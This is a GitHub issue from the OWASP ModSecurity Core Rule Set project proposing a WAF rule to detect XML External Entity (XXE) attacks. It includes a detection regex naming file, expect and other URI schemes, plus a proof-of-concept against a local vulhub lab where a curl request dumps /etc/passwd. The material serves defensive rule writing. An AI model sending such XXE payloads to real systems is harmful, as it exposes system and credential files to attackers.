search

SpiderLabs / owasp-modsecurity-crs

OWASP ModSecurity Core Rule Set (CRS) Project (Official Repository)
https://modsecurity.org/crs
Apache License 2.0
2.45k stars 727 forks source link

XML eXternal Entity #1319

Closed theMiddleBlue closed 5 years ago

theMiddleBlue commented 5 years ago

during the last chat meeting, we talked about creating one or more rules to handle XXE attacks. I'm quite near to a PR, I just want to share with you some topics. I'm trying to cover:

Questions

before opening a new PR:

Example rule

SecRule REQUEST_BODY "@rx <!ENTITY\s+[^\s]+\s+SYSTEM\s+['\"](?i:file|http|https|ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect|zip)://" \
        "id:945020,\
        phase:2,\
        t:none,t:compressWhitespace,\
        log,\
        msg:'XML eXternal Entity: Local or Remote file inclusion',\
        logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
        tag:'application-multi',\
        tag:'platform-multi',\
        tag:'attack-xxe',\
        tag:'OWASP_CRS/WEB_ATTACK/XXE',\
        tag:'WASCTC/WASC-43',\
        tag:'OWASP_TOP_10/A4',\
        tag:'paranoia-level/1',\
        ver:'OWASP_CRS/3.2.0',\
        severity:'CRITICAL',\
        setvar:'tx.msg=%{rule.msg}',\
        setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
        setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
        setvar:'tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/XXE-%{MATCHED_VAR_NAME}=%{MATCHED_VAR}'"

PoC

$ git clone https://github.com/vulhub/vulhub.git
$ cd vulhub/php/php_xxe
$ docker-compose up -d

$ # exploit:
$ curl -s -H 'content-type: application/xml' \
   -d @./xxe.xml \
   'http://localhost:8080/simplexml_load_string.php'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
* Connection #0 to host localhost left intact

thanks

theMiddleBlue commented 5 years ago

closing this. Please, refer to #1320 (XML attack).